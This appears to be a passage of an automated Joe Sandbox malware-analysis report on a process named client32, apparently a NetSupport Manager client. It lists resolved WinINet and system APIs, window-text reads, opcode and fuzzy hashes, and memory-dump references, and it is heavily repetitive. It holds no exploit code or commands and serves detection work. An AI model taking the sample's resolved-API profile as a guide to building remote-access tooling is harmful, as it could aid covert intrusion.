Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: HttpQueryInfoA
API String ID: 199729137-45432230
Opcode ID: 9d370e8702bb2eb4fb32565f02ee4f6304dc5cfc0c27a78042f00c826776d8b5
Instruction ID: 507139d93193c4b4d688daa2f76a2a8799f22f6effcf2719739a69aa507151d1
Opcode Fuzzy Hash: 9d370e8702bb2eb4fb32565f02ee4f6304dc5cfc0c27a78042f00c826776d8b5
Instruction Fuzzy Hash: 58F05E76A40618AFC710DF95D888E9BB7E9EF48765F00C41AF959D7240D674E850CFE0

Function 68C64F20 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,HttpSendRequestExA), ref: 68C64F34
SetLastError.KERNEL32(00000078,00000000,?,68C6B614), ref: 68C64F61

Strings

HttpSendRequestExA, xrefs: 68C64F2E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: HttpSendRequestExA
API String ID: 199729137-1584202490
Opcode ID: 52d3f5a9c534748bd90206f05506d78f1554f4d9894480755ed3a668fa43dd7b
Instruction ID: de33d3d33c82279b9878d442c69cf78420da011244faa73475f4f49a995f6b50
Opcode Fuzzy Hash: 52d3f5a9c534748bd90206f05506d78f1554f4d9894480755ed3a668fa43dd7b
Instruction Fuzzy Hash: 4CF05E72601218AFC720DF98E888E9B77B9EF48B64F00851AFA19D7200D670E854CBF1

Function 68C76FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 68C76FDE
ctl_pittmanfunc.HTCTL32(?,00000001,?,00000050,?,00000004,00000000,00000000,?,00000000,00000050), ref: 68C77018

Part of subcall function 68C762B0: _memset.LIBCMT ref: 68C762F6
Part of subcall function 68C762B0: SetLastError.KERNEL32(00000057), ref: 68C765A3

Strings

P, xrefs: 68C77011

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: _memset$ErrorLastctl_pittmanfunc
String ID: P
API String ID: 2926529296-3110715001
Opcode ID: f2d1140dfb5f7439d07302f2d60303eea8d05a699deef447e1cf8c3fd2467fd0
Instruction ID: 381d87d70c81737ea31faed43461cc031856074b3fc89485d47371f404aa7d87
Opcode Fuzzy Hash: f2d1140dfb5f7439d07302f2d60303eea8d05a699deef447e1cf8c3fd2467fd0
Instruction Fuzzy Hash: 14F0B2B5A4060CABDB14CFD4DC81FAE77B9BB48704F104119FA18AB3C4E7B0A5108B55

Function 68C64BE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetReadFile), ref: 68C64BF4
SetLastError.KERNEL32(00000078), ref: 68C64C1D

Strings

InternetReadFile, xrefs: 68C64BEE

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetReadFile
API String ID: 199729137-1824561397
Opcode ID: 3cb97c9c91e327ac11d1cafe2569cbe49bab3eccc1ee8805f82311d47d02dbe1
Instruction ID: 766e52c58b8502a3aad634a5a76e4e70616f9bed4a5e889d674d693656da5a08
Opcode Fuzzy Hash: 3cb97c9c91e327ac11d1cafe2569cbe49bab3eccc1ee8805f82311d47d02dbe1
Instruction Fuzzy Hash: 5AF05E72600618AFC750CF94E884A9B73B8FB48760F40841AF94697640D6B0F850CFA0

Function 68C64B90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 68C64BA4
SetLastError.KERNEL32(00000078,000000C8,?,68C6B53C,00000000,0000002B,?,?), ref: 68C64BCD

Strings

InternetQueryOptionA, xrefs: 68C64B9E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetQueryOptionA
API String ID: 199729137-3310327128
Opcode ID: 4d57a7df8a434a5bc349bb16d583f20da8a09552f92281998f521d18c50ef2a5
Instruction ID: 5f75e721133b06119a3081cc07eff9a2bb7a257b860f7feb0f2de0cc03828191
Opcode Fuzzy Hash: 4d57a7df8a434a5bc349bb16d583f20da8a09552f92281998f521d18c50ef2a5
Instruction Fuzzy Hash: 39F08C72644618AFC760CF94E8C8F9B73B8FB88761F40482AF946D7640D670F890CBA0

Function 68C64B40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 68C64B54
SetLastError.KERNEL32(00000078), ref: 68C64B7D

Strings

InternetQueryDataAvailable, xrefs: 68C64B4E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetQueryDataAvailable
API String ID: 199729137-452555236
Opcode ID: a70a9db8344cb146c002dd953d90b2de81a11853ab22f1dd47a6f0b82cd888da
Instruction ID: 3fcda9cee5e0edd4415c54c4648ee955e77f989adb9dccb3f95f97193e3a35bd
Opcode Fuzzy Hash: a70a9db8344cb146c002dd953d90b2de81a11853ab22f1dd47a6f0b82cd888da
Instruction Fuzzy Hash: AFF0BE72601618AFC720CF94E984E5B73A8FB48764F40441AF85583600D670F8008FA0

Function 68C64DD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetWriteFile), ref: 68C64DE4
SetLastError.KERNEL32(00000078,?,?,68C69BCE,?,?,?,?), ref: 68C64E0D

Strings

InternetWriteFile, xrefs: 68C64DDE

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetWriteFile
API String ID: 199729137-2273844942
Opcode ID: 9969046c431f0c27b6cd4668bf14dbce16741319da9e0c8d64a184b43429fad7
Instruction ID: 9e46cfdc9272f5cd85375bcca1fc484199b828dbfb7821ed1decbce3af794be0
Opcode Fuzzy Hash: 9969046c431f0c27b6cd4668bf14dbce16741319da9e0c8d64a184b43429fad7
Instruction Fuzzy Hash: E6F08272A10228AFC720CF95D848E5B73B8FB48761F00841AF955D7240D671E850CFA1

Function 68C64D30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetSetOptionA), ref: 68C64D44
SetLastError.KERNEL32(00000078,00000000,?,68C6B392,00000000,0000002B,?,?), ref: 68C64D6D

Strings

InternetSetOptionA, xrefs: 68C64D3E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetSetOptionA
API String ID: 199729137-1247460590
Opcode ID: 27a0794228a8169e8d158faee998725d9f8311466901a60417c6229a59fe2f56
Instruction ID: 35b4488306a534de02c00b0f5df867e451918e7d30cc88c9ab677b9f2e58526b
Opcode Fuzzy Hash: 27a0794228a8169e8d158faee998725d9f8311466901a60417c6229a59fe2f56
Instruction Fuzzy Hash: A9F01276A44628EFC720DF94D844E5B77B8EF49B65F00441AFA59D7240D671F850CBA0

Function 11017000 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,QueueUserWorkItem), ref: 11017014
SetLastError.KERNEL32(00000078), ref: 11017039

Strings

QueueUserWorkItem, xrefs: 1101700E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: QueueUserWorkItem
API String ID: 199729137-2469634949
Opcode ID: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
Instruction ID: 351e0e434b9127e3d5833c8cdc34dd988e3f21fb5a429389f6b6525592fa6d03
Opcode Fuzzy Hash: c81191e4254c18433ccdadfae085f98d5b405293371adbcb053233ac0816d12d
Instruction Fuzzy Hash: 6DF08C32A10328AFC310DFA8D844E9BB7A8FB48721F40842AF94087600C630F8008BA0

Function 68C64D80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,InternetSetStatusCallback), ref: 68C64D94
SetLastError.KERNEL32(00000078,02B92AEC,?,68C6B267,00000000,68C66BD0), ref: 68C64DB5

Strings

InternetSetStatusCallback, xrefs: 68C64D8E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetSetStatusCallback
API String ID: 199729137-894424467
Opcode ID: c603bf4f5db65e6656a6de2799ff853c2eabc3ff5414ff18edbcb54b8b9f795a
Instruction ID: 8a7001684ad5e7318eb307c158339950d369ffc0f1f79f621f6447f68c967227
Opcode Fuzzy Hash: c603bf4f5db65e6656a6de2799ff853c2eabc3ff5414ff18edbcb54b8b9f795a
Instruction Fuzzy Hash: 06E06532944724AFC7209F98D888A9BB7B8EB44765F00442AE945D7600E671E884CBD0

Function 11031020 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,ProcessIdToSessionId), ref: 11031034
SetLastError.KERNEL32(00000078), ref: 11031055

Strings

ProcessIdToSessionId, xrefs: 1103102E

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: ProcessIdToSessionId
API String ID: 199729137-2164408197
Opcode ID: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
Instruction ID: c15e5fa19e0f6f6798f22c3181eac8c4efc8dc53165636b7ac94afd6ac4f5e0b
Opcode Fuzzy Hash: 9acb64e4e52a4edf203ee4f72ae7e17ac8f6d321f9450a0ebd216800fde009b8
Instruction Fuzzy Hash: A9E06532A552245FC310DFB5D844E56F7E8EB58762F00C52AF95997200C670A801CFA0

Function 11157300 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetWindowTextLengthA.USER32(77061A30), ref: 11157303

Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2

GetWindowTextA.USER32(77061A30,00000000,00000001), ref: 1115731D

Strings

..., xrefs: 1115732B

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148166805.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148186159.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: TextWindow$Length_memset
String ID: ...
API String ID: 243528429-1685331755
Opcode ID: 617f2b8ce24be5daefdab75bb62433564d404e2d5d672db981e06d1a518aa2ce
Instruction ID: 3e974f6f281fad8de38b3af03667cb2bd2dd56defaaa0821f91d93156a413d34
Opcode Fuzzy Hash: 617f2b8ce24be5daefdab75bb62433564d404e2d5d672db981e06d1a518aa2ce
Instruction Fuzzy Hash: 7DE02B36D046635FD281463C9C48DCBFB9DEF82228B458470F595D3201DA20D40BC7E0

Function 68C980A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 68C980DA
DName::DName.LIBCMT ref: 68C980E6

Strings

{flat}, xrefs: 68C980D5

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: NameName::
String ID: {flat}
API String ID: 1333004437-2606204563
Opcode ID: ae76bf35780fabcc1cc91ed36de66ed6c50f2df53091316eaaf873894321b0fa
Instruction ID: 215565e795e917581b78a0c63ed4e3d0002d03045d6093f2b13fe0d4ccfc8499
Opcode Fuzzy Hash: ae76bf35780fabcc1cc91ed36de66ed6c50f2df53091316eaaf873894321b0fa
Instruction Fuzzy Hash: 91F039351842489FCF01CF98E594FA93BA8EB4275AF8480C1E55C0F253D732D482CBA5

Function 68C7DC50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 68C7DC59

Part of subcall function 68C81B69: __FF_MSGBANNER.LIBCMT ref: 68C81B82
Part of subcall function 68C81B69: __NMSG_WRITE.LIBCMT ref: 68C81B89
Part of subcall function 68C81B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,68C8D3C1,68C86E81,00000001,68C86E81,?,68C8F447,00000018,68CA7738,0000000C,68C8F4D7), ref: 68C81BAE

_memset.LIBCMT ref: 68C7DC82

Strings

Refcount.cpp, xrefs: 68C7DC6C

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AllocateHeap_malloc_memset
String ID: Refcount.cpp
API String ID: 2365696598-3480236496
Opcode ID: 741b677a1ed8c4674b547e1545817ec36eb77ba4b1e1a612c65ea8cd827992eb
Instruction ID: e2d4166e4511e4ba7d8808418bb3622dd03f6356fdf5a1ba8e878421bd53198e
Opcode Fuzzy Hash: 741b677a1ed8c4674b547e1545817ec36eb77ba4b1e1a612c65ea8cd827992eb
Instruction Fuzzy Hash: 72E0CDA7AC011537C11010A93C06FAFBE5C4B91EBDF850032FB0C66241F695695141D6

Function 68C64C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 68C64C44
SetLastError.KERNEL32(00000078,00000000,?,68C6B677,?), ref: 68C64C61

Strings

InternetCloseHandle, xrefs: 68C64C3E

Memory Dump Source

Source File: 00000006.00000002.3148667089.0000000068C61000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68C60000, based on PE: true

Associated: 00000006.00000002.3148647629.0000000068C60000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148722789.0000000068CA9000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148748475.0000000068CAE000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000006.00000002.3148786200.0000000068CB0000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_68c60000_client32.jbxd

Yara matches

Similarity

API ID: AddressErrorLastProc
String ID: InternetCloseHandle
API String ID: 199729137-3843628324
Opcode ID: 546d648a923189249044f7925186fe4a211ea4e6cc7fd8936da00ed1af8e81a3
Instruction ID: edfa26564b867c28ab95b6fb8674cc5a4c27aa53e4afb612dab754149d0f19cd
Opcode Fuzzy Hash: 546d648a923189249044f7925186fe4a211ea4e6cc7fd8936da00ed1af8e81a3
Instruction Fuzzy Hash: EFE09232940728EFC3349FA49888A4AB7B8AF25765F00052AE555D7201D670E4848BD0

Function 11001080 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 25windowCOMMON

Download Yara Rule

APIs

SendDlgItemMessageA.USER32(?,?,?,?,?), ref: 110010B7

Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9

Strings

m_hWnd, xrefs: 11001096
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11001091

Memory Dump Source

Source File: 00000006.00000002.3148005274.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000006.00000002.3147988633.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
